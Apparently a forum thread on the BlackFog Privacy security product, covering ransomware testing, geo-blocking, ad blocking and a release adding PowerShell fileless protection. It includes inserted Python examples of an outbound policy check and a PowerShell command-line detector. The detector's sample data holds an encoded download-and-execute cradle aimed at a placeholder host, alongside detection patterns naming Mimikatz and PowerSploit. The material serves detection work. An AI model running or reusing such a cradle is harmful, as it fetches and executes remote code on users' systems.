PrivaZer wipes Reliability History on my machines anyway so I can't answer that. Paul, Control Panel > System Security > Review your computer's status > Maintenance > View Reliability History.
It should list your 'real' win updates as well. (and all errors, it's a great little built-in tool) Just hit the windows start flag and immediately start typing reliability... (no need to use the search box)
Darren - a request. Would it be possible to add (task bar) Install Mode - Permanent on / off option, instead of just current 10 min option?
Question for you, Paul. Why would you want to turn off execution prevention entirely? It's a lot more than just some directories. It's specific apps as well, double extension prevention, etc. Just trying to understand the need.
I daily reserve time to update all my apps and portable apps, and this often takes more than 10 minutes. I don't want to have to set install for 10 minutes more than once, or have BFP reactivate during an update. I prefer to control it manually. NVT ERP, for example, has options 10 mins, 30 mins, 1 hr, until reboot, and permanently. Just the latter addition would be OK (for me at least).
Thanks for the response. I totally forgot to read the paper, but it's quite a lot of info. Can you perhaps give examples of malware that BFP can block from connecting out? Personally I'm mostly interested in behavior blockers that can block malware from achieving its goals even when it is already running in memory, so that's why I was a bit skeptical about BFP at first. Think of anti code-injection, keystroke encryption and file/folder protection, but I guess that isn't the focus of BFP.
Hi Rasheed. To me, if they are running at all it's too late. I've been giving a lot of thought to this, and to this product in particular as it relates to ransomware. Apologies to Darren, but people need to think about this.
1. As was pointed out earlier, something can be dropped anywhere on your system. Nuff said.
2. Waiting until a connection is made outbound is way, way too late.
a) I installed BlackFog in a VM and tested ransomware against it. Outbound may have been stopped, but all three (I stopped after that) had a field day encrypting everything.
b) These malware samples aren't sitting there innocently waiting for an outbound connection. They all installed themselves in the Windows Startup key. Some of them even install scripts in registry keys for use later.
The guys at Emsisoft are trying to help someone who got hit by ransomware, paid the fee, got the key but didn't get all the files back. The ONLY protection against these thieves is to keep them out in the first place. Outbound protection just isn't the solution.
I fully agree with Peter. Prevention is definitely better than the cure. In many cases there is no cure once the damage has been done. Is this product even meant to be a defense against ransomware in the first place? I've read some of the posts in this thread, and it seems to me that a good outbound firewall that has good leak protection will achieve the same goal. What type of threats does this product mitigate?
Disregard my last post. I see that Darren has stated it does have execution prevention. I guess they will keep developing it, and improving it to have better detection over time. I guess it is using some behavior blocking to mitigate malicious executions. Maybe in time it will mature.
As for blocking ads and profiling, the only time BFP blocks anything is when I disable uBlock Origin. Of course it could be said that I could remove uBO but I think uBO is currently blocking more than BFP. I know BFP works at a system level but apparently I don't have anything on my machines sending ads or trying to profile me. uBO is a LOT cheaper too.
So while our focus is definitely outbound blocking, that is not the only thing we are doing. We use a layered approach, like execution blocking, ad / tracking blocking and a number of other behavioral techniques, so it's not a single layer that will protect you, but all of them together. Each day we continue to add more layers, so you will only see it improve. Each ransomware variant works differently. Our next level of fileless protection is focused on PowerShell scripts, so that will add yet another layer.
Agreed. The ransomware needs to be stopped in its tracks. It is great that it stops your data from going to a C&C server somewhere overseas, but you are left with files encrypted on your system. For people like us in the tech field it's not too bad, as we have data/system backups etc. The average joe who is not tech savvy will lose everything, or have to go to Best Buy and pay God knows how much to get their system cleaned, and likely not get their data back. I have been watching this thread off and on for the past few weeks and have been tempted to give it a go, but just seeing Peter's experience alone is enough for me to not even bother installing it.
Interesting. I am not really interested in the ad blocking, as I have uBO with uMatrix (and AdGuard) active. But I still see Ads and Profiling blocked:
I'm not using uBlock Origin but I'm using the AdGuard Extension for Edge and still see Ads and Profiling with BFP.
@Darren Williams Is there still an issue with Avast? https://www.blackfog.com/knowledge-base/threat-detection-warning-using-avast-anti-virus/ As I'm using Avast Internet Security on this system, I have not noticed a threat protection event related to this. It looks like the BFP interface has changed; should I uncheck "Suspicious Address"? I have seen some errors in the ProgramData log which I will send via PM. Regards
I have the same red dots on my Traffic Map ... Darren, what is the significance of these? I was wondering if BFP is maybe somehow blocking AdGuard (Russian) hence Ronald and I are seeing ad-blocking?
Not too sure about AdGuard, but you are able to block by country under "Network > Geography". Note China, Russia and Ukraine are blocked by default in BFP. Edit: Added Thumbnail
Here are a few answers. The red dots represent the regions blocked through the Geography area; the black ones represent the actual traffic. If Avast is using direct IPs then yes, it will be a problem with the default settings, as that is a big no-no. Unchecking the Suspicious Address option will allow that. If they also route through Russia you can uncheck the Russia option. If you want to turn off all geo blocking entirely you can use the Geography option in the Blocked settings area. If the Ad blocking is on it should block the ads through any browser. Now there may be a few here and there that are new and haven't been picked up yet, but the team is constantly updating the rules for these. If you have a site that had ads you shouldn't see, you are welcome to PM me and I can send it to the team to review. There are new ad companies popping up every day. One other point here is that if you are using another ad blocker, they will not be blocked twice, so the first one that catches it (the one in the plugin) will get it first, which is why you won't see it in BF.
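To make the two rules in that answer concrete (a "Suspicious Address" rule that blocks connections made to a bare IP with no domain name, and a Geography rule that blocks by destination region, with CN/RU/UA blocked by default), here is an added example of how such an outbound policy check can be written. This is illustrative code written for this thread, not BlackFog's implementation; the region table is constructed from documentation-reserved address ranges and is not real geolocation data.

```python
import ipaddress
from dataclasses import dataclass, field

# Constructed region table for the example only (RFC 5737 test networks).
# A real product would look destinations up in a geolocation database.
REGION_TABLE = [
    (ipaddress.ip_network("203.0.113.0/24"), "RU"),
    (ipaddress.ip_network("198.51.100.0/24"), "CN"),
    (ipaddress.ip_network("192.0.2.0/24"), "US"),
]


@dataclass
class Policy:
    """Hypothetical policy mirroring the options discussed in the thread."""
    blocked_regions: frozenset = field(
        default_factory=lambda: frozenset({"CN", "RU", "UA"}))  # defaults named in the thread
    block_suspicious_address: bool = True   # block connections made to a bare IP
    geo_blocking: bool = True               # master switch for region blocking


def region_of(ip):
    """Map an address to a region code via the constructed table."""
    addr = ipaddress.ip_address(ip)
    for net, region in REGION_TABLE:
        if addr in net:
            return region
    return "UNKNOWN"


def is_direct_ip(host):
    """True when the name the process connected to is an IP literal, not a domain."""
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


def evaluate(host, dest_ip, policy=None):
    """Return ("block" | "allow", reason) for one outbound connection.

    host     -- the name the process asked for (a domain, or the IP itself
                when the program hard-coded an address)
    dest_ip  -- the address the packets actually went to
    """
    policy = policy or Policy()
    # Rule 1: "Suspicious Address" -- a direct-IP connection with no domain
    # behind it is blocked before any region lookup happens.
    if policy.block_suspicious_address and is_direct_ip(host):
        return ("block", f"suspicious address: direct IP {host}")
    # Rule 2: Geography -- block if the destination sits in a blocked region.
    if policy.geo_blocking:
        region = region_of(dest_ip)
        if region in policy.blocked_regions:
            return ("block", f"geography: {region}")
    return ("allow", "no rule matched")


# Constructed connection records: (process, host, destination IP).
SAMPLE_CONNECTIONS = [
    ("browser.exe", "cdn.example.com", "192.0.2.10"),
    ("updater.exe", "203.0.113.5", "203.0.113.5"),       # hard-coded IP, no domain
    ("sync.exe", "mirror.example.org", "203.0.113.44"),  # domain, but hosted in RU
]


def apply_policy(connections, policy=None):
    """Evaluate every record; returns [(process, decision, reason), ...]."""
    return [(proc, *evaluate(host, ip, policy)) for proc, host, ip in connections]


if __name__ == "__main__":
    for proc, decision, reason in apply_policy(SAMPLE_CONNECTIONS):
        print(f"{proc:12} {decision:5} {reason}")
```

The ordering matters for the Avast case mentioned above: with `block_suspicious_address` left on, a vendor component that talks to a hard-coded IP in an allowed region is still blocked by the first rule, which is why unchecking that option (rather than the region) is the fix the answer suggests.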
Regarding blocking IP based on region: this is very nice, but should never be considered to be all inclusive.
1) If anyone remembers the massive credit card breaches at Home Depot and Target, in both cases the breach was discovered only after a number of months. It was found (by serendipity) that pulse outbound transmissions were being made to servers somewhere on the steppes of Central Asia. Both HD and Target were "protected" by SEP which, although logging the event(s), did not block them. Geographical transmission preclusion would have saved much grief and hundreds of millions of dollars.
2) On the other hand, seemingly legitimate servers can be utilized by BlackHats to cover their tracks, examples being the CCleaner fiasco (the C&C being a CubeMotion server in Los Angeles), many Bankers using CloudFlare (USA), and a bunch of ransomware using the Amazon farm in Northern Virginia (down the block and around the corner from Langley).
So yeah, it is a good idea to block stuff depending on region, but just doing this does not make life Rainbows and Unicorns...
Note we have now released version 3.4.0 which adds support for PowerShell Fileless protection. Release notes are as follows:
- Added PowerShell Fileless protection to Network options:
  - Privilege escalation
  - Obfuscation
  - Encoded commands
  - Remote download
  - Remote execution
  - Mimikatz/PowerSploit toolkits
  - Compiled PowerShell
  - PowerShell DLL injection
- Improved SQL performance on multiple inserts
- Improved handling of foreign language character sets
- Fixed possible buffer overflow in notifications
- Improved refresh rates on client when changing geofence on Enterprise console
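As an added illustration of what several of those PowerShell indicator classes look like from a detection point of view, the example below scans process command lines (the kind of data a process-creation audit log carries) for encoded commands, remote download, remote execution, obfuscated string building, toolkit names and privilege escalation, and decodes an -EncodedCommand payload so the same rules can be applied to its contents. This is example code written for this thread, not BlackFog's rules; the regexes, the sample command lines and the `example.invalid` URL are all constructed.

```python
import base64
import re

# Indicator classes from the 3.4.0 notes, as constructed regexes for this
# example (deliberately simple; a real engine would use far richer rules).
ENC_RE = re.compile(r"(?i)(?<![\w-])-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})")
INDICATORS = {
    "encoded_command": ENC_RE,
    "remote_download": re.compile(
        r"(?i)DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Net\.WebClient|Start-BitsTransfer"),
    "remote_execution": re.compile(r"(?i)Invoke-Expression|\biex\b"),
    # [char] casts, concatenation of 1-3 character fragments, -join rebuilds
    "obfuscation": re.compile(r"(?i)\[char\]\s*\d+|'[^']{1,3}'\s*\+\s*'|-join\b"),
    "toolkit": re.compile(r"(?i)mimikatz|powersploit|Invoke-Shellcode|PowerUp"),
    "privilege_escalation": re.compile(r"(?i)-Verb\s+RunAs"),
}


def decode_encoded_command(cmdline):
    """Return the script text behind -EncodedCommand (base64 of UTF-16LE), or None."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None  # not valid base64/UTF-16LE; the encoded_command hit still stands


def scan_command_line(cmdline):
    """Return the sorted list of indicator classes matched by a command line.

    The raw command line and, when present, the decoded -EncodedCommand body
    are both scanned, so encoding alone does not hide the other indicators.
    """
    texts = [cmdline]
    decoded = decode_encoded_command(cmdline)
    if decoded is not None:
        texts.append(decoded)
    hits = set()
    for text in texts:
        for name, rx in INDICATORS.items():
            if rx.search(text):
                hits.add(name)
    return sorted(hits)


def ps_encode(script):
    """Encode a script the way PowerShell expects for -EncodedCommand (used to build the sample)."""
    return base64.b64encode(script.encode("utf-16le")).decode("ascii")


# Constructed sample command lines, as a process-creation log would record them.
CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a')"
SAMPLE_EVENTS = [
    "powershell.exe -NoProfile -Command Get-Service -Name wuauserv",          # benign
    "powershell.exe -w hidden -enc " + ps_encode(CRADLE),                      # encoded cradle
    "powershell.exe -Command \"$s='Get-'+'Pro'+'cess'; Invoke-Expression $s\"",  # built string + IEX
    "powershell.exe -ExecutionPolicy Bypass -File C:\\scripts\\Invoke-Mimikatz.ps1",
    "powershell.exe -Command \"Start-Process powershell -Verb RunAs\"",        # elevation request
]


def scan_events(events):
    """Scan a batch of command lines; returns [(cmdline, [indicators]), ...] for those with hits."""
    return [(e, scan_command_line(e)) for e in events if scan_command_line(e)]


if __name__ == "__main__":
    for cmdline, hits in scan_events(SAMPLE_EVENTS):
        print(", ".join(hits), "<-", cmdline[:70])
```

Note that `-ExecutionPolicy` is not mistaken for an encoded-command switch (the regex requires whitespace after `-e`, `-ec`, `-enc` or `-EncodedCommand`), and that the benign first line produces no hits; keeping false positives low on ordinary administrative command lines is the hard part of this kind of rule.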
While it will work, you will not get as many resolved domains in the hosts tab as before. This is not a problem for most functionality because we actually use raw IPs for most protection, but it will limit the protection for non-HTTP/S traffic because we won't be able to extract the domain name easily. Again, this won't really affect the application very much; it's more about visually seeing the traffic in the UI. The next release (3.5) will have less of an issue because we will not be using DNS very much anyway.